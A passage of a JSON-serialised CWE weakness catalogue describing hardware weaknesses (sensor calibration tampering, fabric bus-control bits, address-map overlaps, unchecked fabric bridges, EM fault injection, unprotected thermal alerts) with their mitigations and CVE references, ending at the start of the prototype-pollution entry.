hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits.","While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1299","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The lack of a requirement to protect parametric values may contribute to this weakness."},{"Phase":"Implementation","Note":"The lack of parametric value protection may be a cause of this weakness."}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["Quality Degradation","DoS: Resource Consumption (Other)"],"Likelihood":"High","Note":"Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value.\\n\\t\\t\\t\\t\\t\\t\\tSuch a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device.","A ring, oscillator-based temperature sensor will generally report the sensed value as\\n\\t\\t\\t\\t\\t\\t\\toscillator frequency rather than degrees centigrade.  The temperature sensor will have\\n\\t\\t\\t\\t\\t\\t\\tcalibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade.","Consider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and\\n\\t\\t\\t\\t\\t\\t\\tis not modifiable by software.  If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down.","The thermal sensor calibration values are programmable through registers that are exposed to system software.\\n\\t\\t\\t\\t\\t\\tThese registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit."]},"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed\\n\\t\\t\\t\\t\\t\\t\\ttemperature is always zero."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:p":["The sensor frequency value is scaled by applying the function:","where a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, \\n\\t\\t\\t\\t\\t\\t\\tpreventing this method of manipulating the temperature."],"xhtml:div":{"#text":"Sensed Temp = a + b * Sensor Freq","attr":{"@_style":"margin-left:10px;"}}}],"Body_Text":"This weakness may be addressed by preventing access to a and b."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2017-8252","Description":"Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8252"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1082"}}},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi","Submission_Organization":"The Intel Corporation","Submission_Date":"2020-07-14"}}},"1315":{"attr":{"@_ID":"1315","@_Name":"Improper Setting of Bus Controlling Capability in Fabric End-point","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric.","Extended_Description":{"xhtml:p":"To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"System Configuration"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Modify Memory","Read Memory","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"Implementation","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."},{"Phase":"System Configuration","Description":"For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit (\u201cPMIC\u201d), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals.","Body_Text":["The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0.  There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders.","Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security.","Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1135"}},{"attr":{"@_External_Reference_ID":"REF-1136"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1316":{"attr":{"@_ID":"1316","@_Name":"Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region.","Extended_Description":{"xhtml:p":["Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected.","Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"Review address map in specification to see if there are any overlapping ranges.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Negative testing of access control on overlapped ranges.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap."},{"Phase":"Implementation","Description":"Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion."},{"Phase":"Testing","Description":"Validate mitigation actions with robust testing."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB.  Registers and other assets that are not security-sensitive require 40KB.  One range register is configured to program 4KB to protect user A\u2019s assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B\u2019s assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range.","Body_Text":["The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data.","Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space.  Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2009-4419","Description":"Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4419"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1137"}}},"Notes":{"Note":{"#text":"As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-06-01"}}},"1317":{"attr":{"@_ID":"1317","@_Name":"Missing Security Checks in Fabric Bridge","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master.  Similarly, it does not check the hardware identity of the transaction received from the slave interface of the bridge.","Extended_Description":{"xhtml:p":["In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect.","For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Bypass Protection Mechanism","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Dynamic Analysis","Description":"RTL simulation to ensure that bridge-access controls are implemented properly.","Effectiveness":"High"},{"Method":"Manual Static Analysis","Description":"Formal verification of bridge RTL to ensure that access control cannot be bypassed.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Design includes provisions for access-control checks in the bridge for both upstream and downstream transactions."},{"Phase":"Implementation","Description":"Implement access-control checks in the bridge for both upstream and downstream transactions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus.","Body_Text":["The bridge does not implement the checks and allows reads and writes from all privilege levels.","To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes."]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"122"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1138"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-19"}}},"1318":{"attr":{"@_ID":"1318","@_Name":"Missing Support for Security Features in On-chip Fabrics or Buses","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control.","Extended_Description":{"xhtml:p":"Certain on-chip fabrics and buses, especially simple and low-power buses, do not support security features.  Apart from data transfer and addressing ports, some fabrics and buses do not have any interfaces to transfer privilege, immutable identity, or any other security attribute coming from the bus master.  Similarly, they do not have dedicated signals to transport security-sensitive data from slave to master, such as completions for certain types of transactions.  Few other on-chip fabrics and buses support security features and define specific interfaces/signals for transporting security attributes from master to slave or vice-versa.  However, including these signals is not mandatory and could be left unconfigured when generating the register-transfer-level (RTL) description for the fabric.  Such fabrics or buses should not be used to transport any security attribute coming from the bus master.  In general, peripherals with security assets should not be connected to such buses before the transaction from the bus master reaches the bus, unless some form of access control is performed at a fabric bridge or another intermediate module."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["DoS: Crash, Exit, or Restart","Read Memory","Modify Memory"],"Likelihood":"Medium"}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review the fabric specification and ensure that it contains signals to transfer security-sensitive signals.","Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":"Lack of security features can also be confirmed through manual RTL review of the fabric RTL.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"If fabric does not support security features, implement security checks in a bridge or any component that is between the master and the fabric.  Alternatively, connect all fabric slaves that do not have any security assets under one such fabric and connect peripherals with security assets to a different fabric that supports security features."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Several systems on chips (SoCs) use the Advanced-Microcontroller Bus Architecture (AMBA) Advanced-Peripheral Bus (APB) protocol.  APB is a simple, low-power bus and uses the PPROT[2:0] bits to indicate the security state of the bus masters ;PPROT[0] indicates privilege, PPROT[1] indicates secure/non-secure transaction, and PPROT[2] indicates instruction/data.  Assume that there is no fabric bridge in the SoC. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["The APB bus is used to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. For a CPU supporting 8 potential identities (each with varying privilege levels), 16 types of outgoing transactions can be made--8 read transactions with each supported privilege level and 8 write transactions with each supported privilege level.","Since APB PPROT can only support up to 8 transaction types, access-control checks cannot be performed on transactions going to the slaves at the right granularity for all possible transaction types.  Thus, potentially, user code running on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device, resulting in permanent denial of service.","In this scenario, only peripherals that need access protection from 8 of the 16 possible transaction types can be connected to the APB bus. Peripherals that require protection from the remaining 8 transaction types can be connected to a different APB bus. Alternatively, a bridge could be implemented to handle such complex scenarios before forwarding traffic to the APB bus."]},{"Intro_Text":"The Open-Core-Protocol (OCP) fabric supports two configurable, width-optional signals for transporting security attributes: MReqInfo and SRespInfo.  MReqInfo is used to transport security attributes from bus master to slave, and SRespInfo is used to transport security attributes from slave to bus master. An SoC uses OCP to connect several bus masters, each with a unique and immutable hardware identity, to several slaves.  One of the bus masters, the CPU, reports the privilege level (user or super user) in addition to the unique identity.  One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits.","Body_Text":["Since MReqInfo and SRespInfo are not mandatory, these signals are not configured when autogenerating RTL for the OCP fabric.  Thus, the fabric cannot be used to transport security attributes from bus masters to slave.","Code running at user-privilege level on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device and cause permanent denial of service.","To address this, configure the fabric to include MReqInfo and SRespInfo signals and use these to transport security identity and privilege level to perform access-control checks at the slave interface."]}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1139"}},{"attr":{"@_External_Reference_ID":"REF-1140"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-20"}}},"1319":{"attr":{"@_ID":"1319","@_Name":"Improper Protection against Electromagnetic Fault Injection (EM-FI)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed.","Extended_Description":{"xhtml:p":"Electromagnetic fault injection may allow an attacker to locally and dynamically modify the signals (both internal and external) of an integrated circuit. EM-FI attacks consist of producing a local, transient magnetic field near the device, inducing current in the device wires. A typical EMFI setup is made up of a pulse injection circuit that generates a high current transient in an EMI coil, producing an abrupt magnetic pulse which couples to the target producing faults in the device, which can lead to:","xhtml:ul":{"xhtml:li":["Bypassing security mechanisms such as secure JTAG or Secure Boot","Leaking device information","Modifying program flow","Perturbing secure hardware modules (e.g. random number generators)"]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Availability"],"Impact":["Modify Memory","Read Memory","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["1. Redundancy \u2013 By replicating critical operations and comparing the two outputs can help indicate whether a fault has been injected.","2. Error detection and correction codes - Gay, Mael, et al. proposed a new scheme that not only detects faults injected by a malicious adversary but also automatically corrects single nibble/byte errors introduced by low-multiplicity faults.","3. Fail by default coding - When checking conditions (switch or if) check all possible cases and fail by default because the default case in a switch (or the else part of a cascaded if-else-if construct) is used for dealing with the last possible (and valid) value without checking. This is prone to fault injection because this alternative is easily selected as a result of potential data manipulation [REF-1141].","4. Random Behavior - adding random delays before critical operations, so that timing is not predictable.","5. Program Flow Integrity Protection \u2013 The program flow can be secured by integrating run-time checking aiming at detecting control flow inconsistencies. One such example is tagging the source code to indicate the points not to be bypassed [REF-1147].","6. Sensors \u2013 Usage of sensors can detect variations in voltage and current.","7. Shields \u2013 physical barriers to protect the chips from malicious manipulation."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In many devices, security related information is stored in fuses. These fuses are loaded into shadow registers at boot time. Disturbing this transfer phase with EM-FI can lead to the shadow registers storing erroneous values potentially resulting in reduced security.","Body_Text":"Colin O\'Flynn has demonstrated an attack scenario which uses electro-magnetic glitching during booting to bypass security and gain read access to flash, read and erase access to shadow memory area (where the private password is stored). Most devices in the MPC55xx and MPC56xx series that include the Boot Assist Module (BAM) (a serial or CAN bootloader mode) are susceptible to this attack. In this paper, a GM ECU was used as a real life target. While the success rate appears low (less than 2 percent), in practice a success can be found within 1-5 minutes once the EMFI tool is setup. In a practical scenario, the author showed that success can be achieved within 30-60 minutes from a cold start."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1141"}},{"attr":{"@_External_Reference_ID":"REF-1142"}},{"attr":{"@_External_Reference_ID":"REF-1143"}},{"attr":{"@_External_Reference_ID":"REF-1144"}},{"attr":{"@_External_Reference_ID":"REF-1145"}},{"attr":{"@_External_Reference_ID":"REF-1146"}},{"attr":{"@_External_Reference_ID":"REF-1147"}}]},"Notes":{"Note":{"#text":"This entry is attack-oriented and may require significant modification in future versions, or even deprecation. It is not clear whether there is really a design \\"mistake\\" that enables such attacks, so this is not necessarily a weakness and may be more appropriate for CAPEC.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Sebastien Leger, Rohini Narasipur","Submission_Organization":"Bosch","Submission_Date":"2020-08-27"}}},"1320":{"attr":{"@_ID":"1320","@_Name":"Improper Protection for Out of Bounds Signal Level Alerts","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts.","Extended_Description":{"xhtml:p":["Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS.  \\n\\t\\t\\t\\tModification of these limits may be protected by hardware mechanisms.","When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling.","Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS).\\n\\t\\t\\t\\tThese alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Memory IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Power Management IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Test/Debug IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Sensor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Instability","DoS: Crash, Exit, or Restart","Reduce Reliability","Unexpected State"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value.\\n\\t\\t\\t\\t\\t\\t\\tIf the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor.","The processor, upon getting the alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode."]},"Example_Code":[{"#text":"The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin.","attr":{"@_Nature":"bad"}},{"#text":"The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS.","attr":{"@_Nature":"good"}}],"Body_Text":"Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"}}},"1321":{"attr":{"@_ID":"1321","@_Name":"Improperly Controlled Modification of Object Prototype Attributes (\'Prototype Pollution\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.","Extended_Description":{"xhtml:p":["By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf).","This weakness is usually exploited by using a special attribute of objects called proto,  constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"915","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"471","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and 